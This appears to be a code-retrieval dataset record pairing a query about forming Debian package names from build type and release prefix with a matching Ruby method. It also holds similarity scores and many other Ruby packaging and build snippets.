"def reprepro_has_dsc?(debian_pkg_name, release_name, codename, reuseLock = false)\n @reprepro_lock.lock unless reuseLock\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n cmd = \"#{reprepro_bin} -T dsc -V -b #{reprepro_dir} list #{codename} #{debian_pkg_name}\"\n package_info = `#{cmd}`\n if !package_info.empty?\n Packager.info \"Reprepro: dsc file for #{debian_pkg_name} available for #{codename}\"\n return true\n else\n Packager.info \"Reprepro: dsc file for #{debian_pkg_name} not available for #{codename}\"\n return false\n end\n ensure\n @reprepro_lock.unlock unless reuseLock\n end\n end",
"def debian_version\n super ||\n ( version_gte?( ubuntu_version, [18,4] ) && '10' ) ||\n ( version_gte?( ubuntu_version, [15,4] ) && '8' ) ||\n ( version_gte?( ubuntu_version, [14,4] ) && '7' ) ||\n ( version_gte?( ubuntu_version, [12,4] ) && '6' )\n end",
"def key\n \"gem-package-#{name}\"\n end",
"def server_pkg_name\n platform_family?('debian') ? \"postgresql-#{new_resource.version}\" : \"postgresql#{new_resource.version.delete('.')}-server\"\n end",
"def available_version(package_name, arch = nil)\n version(package_name, arch, true, false)\n end",
"def supported_pkgs\n {\"rpm\"=>1, \"deb\"=>1}\nend",
"def get_saltstack_package_full_name(package)\n # pillar = YAML.safe_load(File.read('test/salt/pillar/windows.sls'))\n url = 'https://raw.githubusercontent.com/saltstack/salt-winrepo-ng/master/'\n files = [package + '.sls', package + '/init.sls']\n # example: package = \"7zip\"=>{\"version\"=>\"18.06.00.0\", \"refresh_minion_env_path\"=>false}\n saltstack_package_full_name = files.find do |checkme|\n ps = \"$f = (((Get-ChildItem -Path $env:LOCALAPPDATA -Filter 'salt-winrepo-ng' -Recurse -Directory).Fullname[0]) + '\\\\#{checkme.sub('/', '\\\\')}'); if (Test-Path $f -PathType Leaf) {Get-Content -Path $f}\"\n begin\n file = (open(url + checkme) & :read)\n rescue\n begin\n file = (powershell(ps).stdout)\n rescue\n next\n end\n end\n unless file.nil? || file.empty?\n candidate = file.match(/full_name: '([\\S]+).*'/).captures[0]\n end\n break candidate unless candidate.nil?\n end\n Inspec::Log.debug('[get_saltstack_package_full_name] found candidate: ' + saltstack_package_full_name)\n saltstack_package_full_name\nend",
"def dmg_package_app\n case new_resource.source\n when :direct\n ::File.basename(package_metadata[:url], '.dmg')\n else\n ::File.basename(new_resource.source.to_s, '.dmg')\n end\n end",
"def platform_shortname\n if rhel?\n if \"rocky\" == Ohai[\"platform\"]\n \"rocky\"\n else\n \"el\"\n end\n elsif suse?\n \"sles\"\n else\n Ohai[\"platform\"]\n end\n end",
"def pkg_binary; \"pacaur\" end",
"def native_release_packages\n @attributes[:native_release_packages]\n end",
"def split_name_package(fullname)\n fixing = fullname.gsub(/:/, \".\")\n split = fixing.match(/^(?:((?:\\w+\\.?)*)\\.)?(\\w+)$/) || []\n name = split[2] || \"\"\n package = split[1] || \"\"\n # downcase the first letter of each package name\n package = package.split(\".\").map {|s| s[0].downcase+s[1..-1]}.join(\".\")\n [name, package]\n end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def release_manifest_name\n \"#{name}-release-manifest\"\n end",
"def get_linux_distro_version_codename\n version_codename_regex = /^VERSION_CODENAME=\\W*(\\w+)\\W*/\n File.open('/etc/os-release') do |release_file|\n release_file.each do |line|\n return line.match(version_codename_regex)[1].downcase if line =~ version_codename_regex\n end\n end\n ''\n end",
"def build_product(name, final_package_prefix=nil)\n dc_name = name.downcase # Ex: 'server', 'devkit', 'moxi'\n\n act_name = dc_name\n act_name = 'membase' if dc_name == 'server'\n\n package_prefix = get_package_prefix(dc_name)\n\n case os_short()\n when 'win'\n fix_ism(\"is_#{dc_name}/#{dc_name}.ism\")\n fix_script(\"is_#{dc_name}/Script Files/Setup.Rul\", dc_name)\n sh \"\\\"#{INSTALL_SHIELD}\\\" -p is_#{dc_name}/#{dc_name}.ism\"\n package_prefix = final_package_prefix if final_package_prefix\n FileUtils.cp(Dir.glob(\"./is_#{dc_name}/PROJECT*/**/setup.exe\")[0],\n \"./is_#{dc_name}/#{package_prefix}_setup.exe\")\n else\n # For other generic unix-y platforms, do a tar'ing.\n # Here, we depend on a previous build_product_mm() step to\n # have filled the out directory with the right files.\n out_dir = get_tmp(\"#{package_prefix}\", false)\n\n if latest_only()\n suffix = 'latest'\n else\n suffix = product_version()\n end\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n familiarize = \"./RedHat/familiarize_#{act_name}.sh RedHat\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(familiarize)\n elsif is_ubuntu?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n make_bin_dist = \"./Ubuntu/make_bin_dist_#{act_name}.sh Ubuntu\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(make_bin_dist)\n end\n end\n\n if os_short() == 'sunos'\n tar = \"gtar\"\n else\n tar = \"#{bin('tar')}\"\n end\n\n print \"File.dirname(out_dir): #{File.dirname(out_dir)}\\n\"\n\n package = \"#{package_prefix}_#{suffix}.tar.gz\"\n cmd = \"#{tar} --directory #{File.dirname(out_dir)}\" +\n \" -czf #{package}\" +\n \" #{File.basename(out_dir)}\"\n hard_sh(cmd)\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.rpm\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.rpm\"\n hard_sh(cmd)\n\n cmd = \"cp #{package_prefix}_#{suffix}.tar.gz\" +\n \" ~/rpmbuild/SOURCES/#{package_prefix}_#{PRODUCT_VERSION_PREFIX}.tar.gz\"\n hard_sh(cmd)\n cmd = \"rpmbuild -bb RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n cmd = \"rm RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n\n cmd = \"mv ~/rpmbuild/RPMS/*/#{package_prefix}-#{PRODUCT_VERSION_PREFIX}-1.*.rpm #{package}\"\n hard_sh(cmd)\n elsif is_ubuntu?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.deb\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.deb\"\n hard_sh(cmd)\n\n cmd = \"mv ./Ubuntu/deb-dev/#{package_prefix}_*.deb #{package}\"\n hard_sh(cmd)\n end\n end\n\n if package\n if final_package_prefix\n package_prev = package\n package = final_package_prefix + '_' + package.split('_')[1..-1].join('_')\n cmd = \"mv #{package_prev} #{package}\"\n hard_sh(cmd)\n end\n\n hard_sh(\"md5sum #{package} > #{package}.md5\")\n end\n end\nend",
"def fully_qualified_wire_name\n return java_package\n end",
"def rpm_no_arch\n @rpm_no_arch\n end",
"def package_file\n File.join('/tmp/fpm-recipes/duo-openvpn/pkg',\n case node['platform_family']\n when 'debian'\n \"duo-openvpn_#{version}-#{revision}_amd64.deb\"\n when 'rhel'\n \"duo-openvpn-#{version}-#{revision}.x86_64.rpm\"\n end)\n end",
"def manifest_name(name, pack_type)\n name.chomp(\".#{pack_type}\")\n end",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def name\n @name ||= Dir['*.gemspec'].first.split('.').first\nend",
"def all_package_names\n each_autobuild_package.map(&:name)\n end",
"def is_debian?\n return !!@name.match(/^debian-.*$/)\n end",
"def package_download_url\n package_filename_url_safe = Info.release_version.gsub(\"+\", \"%2B\")\n \"https://#{Info.release_bucket}.#{Info.release_bucket_s3_endpoint}/ubuntu-focal/#{Info.package}_#{package_filename_url_safe}_amd64.deb\"\n end",
"def fully_qualified_name\n return \".#{self.package}\"\n end",
"def pkg_path\n \"pkg/#{spec.full_name}\"\n end",
"def spec_name\n \"#{full_name}.gemspec\"\n end",
"def full_name\n \"#{@name}-#{@version}\"\n end",
"def package_available?(package_name)\n refresh\n\n if @rpmdb.lookup(package_name)\n return true\n else\n if package_name =~ /^(.*)\\.(.*)$/\n pkg_name = $1\n pkg_arch = $2\n\n if matches = @rpmdb.lookup(pkg_name)\n matches.each do |m|\n return true if m.arch == pkg_arch\n end\n end\n end\n end\n\n false\n end",
"def guess_package_name(gem_name, args)\n package_name = nil\n package_name ||= guess_package_name_from_args(gem_name, args)\n package_name ||= guess_package_name_from_environment\n package_name ||= guess_package_name_from_appfile\n package_name ||= guess_package_name_from_config_files\n package_name\n end",
"def default_platform_service_name(version: installed_postgresql_major_version, source: installed_postgresql_package_source)\n if platform_family?('rhel', 'fedora', 'amazon') && source.eql?(:repo)\n \"postgresql-#{version}\"\n else\n 'postgresql'\n end\n end",
"def repository_name\n @repository_name ||= \"#{project_name}-boshrelease\"\n end",
"def type_and_version\n self.name.gsub(\"#{Licensed::Sources.name}::\", \"\")\n .gsub(/([A-Z\\d]+)([A-Z][a-z])/, \"\\\\1_\\\\2\".freeze)\n .gsub(/([a-z\\d])([A-Z])/, \"\\\\1_\\\\2\".freeze)\n .downcase\n .split(\"::\")\n end",
"def project_name\n DeliveryGolang::Helpers.project_name(node)\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def to_s\n \"#{@distro.capitalize} #{@product.gsub(/_/, ' ').capitalize} #{@version}\"\n end",
"def drop_prefix(repo)\n repo.split('-')[1].to_s.capitalize\nend",
"def get_root name\n\troot = name.dup\n\t%w{ _[^_]*bundle\n\t\t_prototype _demo _promo _game _core\n\t\t_(no_)?soundtrack(_only)? withsoundtrack _only_audio _audio _score\n\t\t_android_and_pc _android _linux _mac _windows _win _pc\n\t\t_freesong _song _remix\n\t\t_free _text _comic\n\t\t_goty _directorscut _alldlc\n\t\t_book _ebook _coloringbook _pdf _makingof _papercraft _artbook\n\t\t_excerpt _dlc _?premium _deluxe _asm}.each do |sfx|\n\t\troot.sub!(Regexp.new(sfx), '')\n\tend\n\troot.sub!(/_((vol|issue)\\d+)/, '/\\1')\n\t[\n\t\t[ /^aaaaaa_?/, 'aaaaaa' ],\n\t\t[ /^amnesia_/, 'amnesia' ],\n\t\t[ /^anomaly/, 'anomaly' ],\n\t\t[ /^bittrip/, 'bittrip' ],\n\t\t[ /^trine2_?/, 'trine2' ],\n\t\t[ /^trine_enhanced/, 'trine' ],\n\t\t[ /^kingdomrush?/, 'kingdomrush' ], # yes, there's one with a missing h\n\t\t[ /^(the)?blackwell/, 'blackwell' ],\n\t\t[ /^ftlfasterthanlight(_ae)?/, 'ftl' ],\n\t\t[ /^talisman_?/, 'talisman' ],\n\t\t[ /^catan_?/, 'catan' ],\n\t\t[ /^shadowgrounds_?/, 'shadowgrounds' ],\n\t\t[ /^theinnerworld_?/, 'theinnerworld' ],\n\t\t[ /^peteseeger_?/, 'peteseeger' ],\n\t\t[ /^tothemoon_?/, 'tothemoon' ],\n\t\t[ /^preteniousgame_?/, 'pretentiousgame' ],\n\t\t[ /^la[-_]mulana_?/, 'lamulana' ],\n\t\t[ /^oddworld_strangerswrath_?/, 'oddworld/strangerswrath'],\n\t]. each do |pair|\n\t\trx = pair.first\n\t\tbase = pair.last\n\t\troot = File.join(base, root.sub(rx,'')) if rx.match root\n\tend\n\troot.gsub!('_', '-')\n\treturn root\nend",
"def installer_filename\n if PRE_RELEASE\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar\"\n else\n \"puppet-enterprise-#{pe_version}-el-7-x86_64.tar.gz\"\n end\nend",
"def get_pkg_extn\n node.java.version == '6' ? 'bin' : node[:java]['package']['extn']\n end",
"def full_name\n \"#{spec.name}-#{spec.version}\"\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def package_set_name(path, branch='master')\n file = dir_git(path,branch,/source\\.yml/)\n raw = raw_file_from_git(path,file[0])\n yaml = YAML.load(raw)\n yaml[\"name\"]\n end",
"def lookup(package_name)\n pkgs = @rpms[package_name]\n if pkgs\n pkgs.sort.reverse\n else\n nil\n end\n end",
"def file_name\n \"#{full_name}.gem\"\n end",
"def pkg_cmd; \"#{pkg_binary}\" end"
] | [
"0.826601",
"0.81080985",
"0.7972412",
"0.77185374",
"0.7390493",
"0.7352227",
"0.6973002",
"0.6898783",
"0.68203634",
"0.6602259",
"0.6598977",
"0.65763",
"0.64230126",
"0.64132184",
"0.6339344",
"0.63144815",
"0.6306574",
"0.62908",
"0.62867904",
"0.6243514",
"0.62379354",
"0.62008196",
"0.6189299",
"0.61730987",
"0.6118869",
"0.6051442",
"0.604249",
"0.60405827",
"0.60247356",
"0.6016534",
"0.59863126",
"0.59697556",
"0.5968167",
"0.5960249",
"0.59359246",
"0.59154195",
"0.588937",
"0.58872426",
"0.5887197",
"0.587925",
"0.5867127",
"0.5852225",
"0.58483285",
"0.58445084",
"0.5831527",
"0.5823342",
"0.5802118",
"0.5788281",
"0.57856107",
"0.571177",
"0.5658529",
"0.5643348",
"0.56269747",
"0.56167537",
"0.55965143",
"0.55664724",
"0.5514956",
"0.55101305",
"0.5504997",
"0.55049956",
"0.5501844",
"0.54947346",
"0.54899263",
"0.54827666",
"0.54814583",
"0.54670954",
"0.54496855",
"0.54402316",
"0.54379535",
"0.543231",
"0.5431677",
"0.5431677",
"0.5431677",
"0.5431677",
"0.5429006",
"0.5423906",
"0.5413957",
"0.54091406",
"0.54080087",
"0.540551",
"0.53880996",
"0.53878266",
"0.5378105",
"0.53764933",
"0.5372892",
"0.53688985",
"0.5363478",
"0.53633916",
"0.5362808",
"0.53521",
"0.535076",
"0.53474796",
"0.5336028",
"0.5329182",
"0.5319097",
"0.53172356",
"0.53146166",
"0.5294019",
"0.5292661",
"0.5287258"
] | 0.776134 | 3 |
Create a debian package name from a given plain name according to build type, release name and release_prefix setting | def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)
if build_type == :ruby
if with_rock_release_prefix
rock_release_prefix(release_name) + "ruby-" + Deb.canonize(name)
else
pkg_prefix_base + "-ruby-" + Deb.canonize(name)
end
else
if with_rock_release_prefix
rock_release_prefix(release_name) + Deb.canonize(name)
else
pkg_prefix_base + "-" + Deb.canonize(name)
end
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def debian_name(pkginfo, with_rock_release_prefix = true, release_name = nil)\n if pkginfo.kind_of?(String)\n raise ArgumentError, \"method debian_name expects a PackageInfo as argument, got: #{pkginfo.class} '#{pkginfo}'\"\n end\n name = pkginfo.name\n\n debianize_name(name,\n build_type: pkginfo.build_type,\n with_rock_release_prefix: with_rock_release_prefix,\n release_name: release_name)\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)\n if with_rock_release_prefix\n rock_ruby_release_prefix(release_name) + Deb.canonize(name)\n else\n \"ruby-\" + Deb.canonize(name)\n end\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def package_name\n if supports_ports?\n if makefile_variable_value(\"PKGNAME\", port_path) =~ /^(.+)-[^-]+$/\n $1\n else\n raise Chef::Exceptions::Package, \"Unexpected form for PKGNAME variable in #{port_path}/Makefile\"\n end\n else\n new_resource.package_name\n end\n end",
"def manifest_name(name, pack_type)\n name.chomp(\".#{pack_type}\")\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def package_filename\n \"#{@package.name}_#{@package.version}_#{@package.architecture}.deb\"\n end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def hadoop_package(name)\n return name unless hdp22?\n return name if node['platform_family'] == 'debian'\n fw = name.split('-').first\n pv = hdp_version.tr('.', '_').tr('-', '_')\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def full_name\n \"#{@package}.#{parameterized_name}\"\n end",
"def package_from_name\n case name.downcase\n when 'splunk' then package :splunk\n when 'universal_forwarder' then package :universal_forwarder\n else raise 'Package must be specified (:splunk or :universal_forwarder)'\n end\n end",
"def release_name\n return nil unless @data['name'] && @data['version']\n [ dashed_name, @data['version'] ].join('-')\n end",
"def rock_release_prefix(release_name = nil)\n release_name ||= rock_release_name\n if release_name\n pkg_prefix_base + \"-#{release_name}-\"\n else\n pkg_prefix_base + \"-\"\n end\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def build_product(name, final_package_prefix=nil)\n dc_name = name.downcase # Ex: 'server', 'devkit', 'moxi'\n\n act_name = dc_name\n act_name = 'membase' if dc_name == 'server'\n\n package_prefix = get_package_prefix(dc_name)\n\n case os_short()\n when 'win'\n fix_ism(\"is_#{dc_name}/#{dc_name}.ism\")\n fix_script(\"is_#{dc_name}/Script Files/Setup.Rul\", dc_name)\n sh \"\\\"#{INSTALL_SHIELD}\\\" -p is_#{dc_name}/#{dc_name}.ism\"\n package_prefix = final_package_prefix if final_package_prefix\n FileUtils.cp(Dir.glob(\"./is_#{dc_name}/PROJECT*/**/setup.exe\")[0],\n \"./is_#{dc_name}/#{package_prefix}_setup.exe\")\n else\n # For other generic unix-y platforms, do a tar'ing.\n # Here, we depend on a previous build_product_mm() step to\n # have filled the out directory with the right files.\n out_dir = get_tmp(\"#{package_prefix}\", false)\n\n if latest_only()\n suffix = 'latest'\n else\n suffix = product_version()\n end\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n familiarize = \"./RedHat/familiarize_#{act_name}.sh RedHat\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(familiarize)\n elsif is_ubuntu?\n # PRODUCT_VERSION looks like 0.0.0-0-g12344321-linux.i686\n # Let's put the git id as the release\n #\n make_bin_dist = \"./Ubuntu/make_bin_dist_#{act_name}.sh Ubuntu\" +\n \" #{File.dirname(out_dir)}/#{File.basename(out_dir)} #{PRODUCT_VERSION_PREFIX} 1\"\n hard_sh(make_bin_dist)\n end\n end\n\n if os_short() == 'sunos'\n tar = \"gtar\"\n else\n tar = \"#{bin('tar')}\"\n end\n\n print \"File.dirname(out_dir): #{File.dirname(out_dir)}\\n\"\n\n package = \"#{package_prefix}_#{suffix}.tar.gz\"\n cmd = \"#{tar} --directory #{File.dirname(out_dir)}\" +\n \" -czf #{package}\" +\n \" #{File.basename(out_dir)}\"\n hard_sh(cmd)\n\n if \"#{dc_name}\" != \"devkit\"\n if is_rhel?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.rpm\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.rpm\"\n hard_sh(cmd)\n\n cmd = \"cp #{package_prefix}_#{suffix}.tar.gz\" +\n \" ~/rpmbuild/SOURCES/#{package_prefix}_#{PRODUCT_VERSION_PREFIX}.tar.gz\"\n hard_sh(cmd)\n cmd = \"rpmbuild -bb RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n cmd = \"rm RedHat/#{package_prefix}.spec.#{PRODUCT_VERSION_PREFIX}\"\n hard_sh(cmd)\n\n cmd = \"mv ~/rpmbuild/RPMS/*/#{package_prefix}-#{PRODUCT_VERSION_PREFIX}-1.*.rpm #{package}\"\n hard_sh(cmd)\n elsif is_ubuntu?\n package = \"./#{package_prefix}_#{arch}_#{PRODUCT_GIT_DESCRIBE}.deb\"\n cmd = \"rm -f #{package_prefix}_#{arch}_*.deb\"\n hard_sh(cmd)\n\n cmd = \"mv ./Ubuntu/deb-dev/#{package_prefix}_*.deb #{package}\"\n hard_sh(cmd)\n end\n end\n\n if package\n if final_package_prefix\n package_prev = package\n package = final_package_prefix + '_' + package.split('_')[1..-1].join('_')\n cmd = \"mv #{package_prev} #{package}\"\n hard_sh(cmd)\n end\n\n hard_sh(\"md5sum #{package} > #{package}.md5\")\n end\n end\nend",
"def set_dpkg_package_name(name)\n dpkg_package.name name\n dpkg_package.package_name name\n end",
"def output_package(pkg_type)\n case pkg_type\n when 'makeself'\n \"#{package_name}-#{build_version}_#{iteration}.sh\"\n when 'msi'\n Packager::WindowsMsi.new(self).package_name\n when 'bff'\n \"#{package_name}.#{bff_version}.bff\"\n when 'pkgmk'\n \"#{package_name}-#{build_version}-#{iteration}.solaris\"\n when 'mac_pkg'\n Packager::MacPkg.new(self).package_name\n when 'mac_dmg'\n pkg = Packager::MacPkg.new(self)\n Packager::MacDmg.new(pkg).package_name\n else # fpm\n require \"fpm/package/#{pkg_type}\"\n pkg = FPM::Package.types[pkg_type].new\n pkg.version = build_version\n pkg.name = package_name\n pkg.iteration = iteration\n if pkg_type == 'solaris'\n pkg.to_s('NAME.FULLVERSION.ARCH.TYPE')\n else\n pkg.to_s\n end\n end\n end",
"def release_manifest_name\n \"#{name}-release-manifest\"\n end",
"def safe_base_package_name\n if project.package_name =~ /\\A[a-z0-9\\.\\+\\-]+\\z/\n project.package_name.dup\n else\n converted = project.package_name.downcase.gsub(/[^a-z0-9\\.\\+\\-]+/, \"-\")\n\n log.warn(log_key) do\n \"The `name' component of IPS package names can only include \" \\\n \"lowercase alphabetical characters (a-z), numbers (0-9), dots (.), \" \\\n \"plus signs (+), and dashes (-). Converting `#{project.package_name}' to \" \\\n \"`#{converted}'.\"\n end\n converted\n end\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def fix_name(name)\n if name.start_with?(\"python\")\n # If the python package is called \"python-foo\" strip the \"python-\" part while\n # prepending the package name prefix.\n return [attributes[:python_package_name_prefix], name.gsub(/^python-/, \"\")].join(\"-\")\n else\n return [attributes[:python_package_name_prefix], name].join(\"-\")\n end\n end",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def package_name(val = NULL_ARG)\n @package_name = val unless val.equal?(NULL_ARG)\n @package_name.nil? ? @name : @package_name\n end",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def manifest_name(name, pack_type)\n return name if File.extname(name.to_s).empty?\n File.basename(name, '.' + pack_type)\n end",
"def generateBuildNamePrefix_Debug()\n prefix = generateBuildNamePrefix\n return prefix + \"-debug\"\nend",
"def manifest_name(name, pack_type)\n return name if File.extname(name.to_s).empty?\n File.basename(name, \".#{pack_type}\")\n end",
"def manifest_name(name, pack_type)\n return name if File.extname(name.to_s).empty?\n File.basename(name, \".#{pack_type}\")\n end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
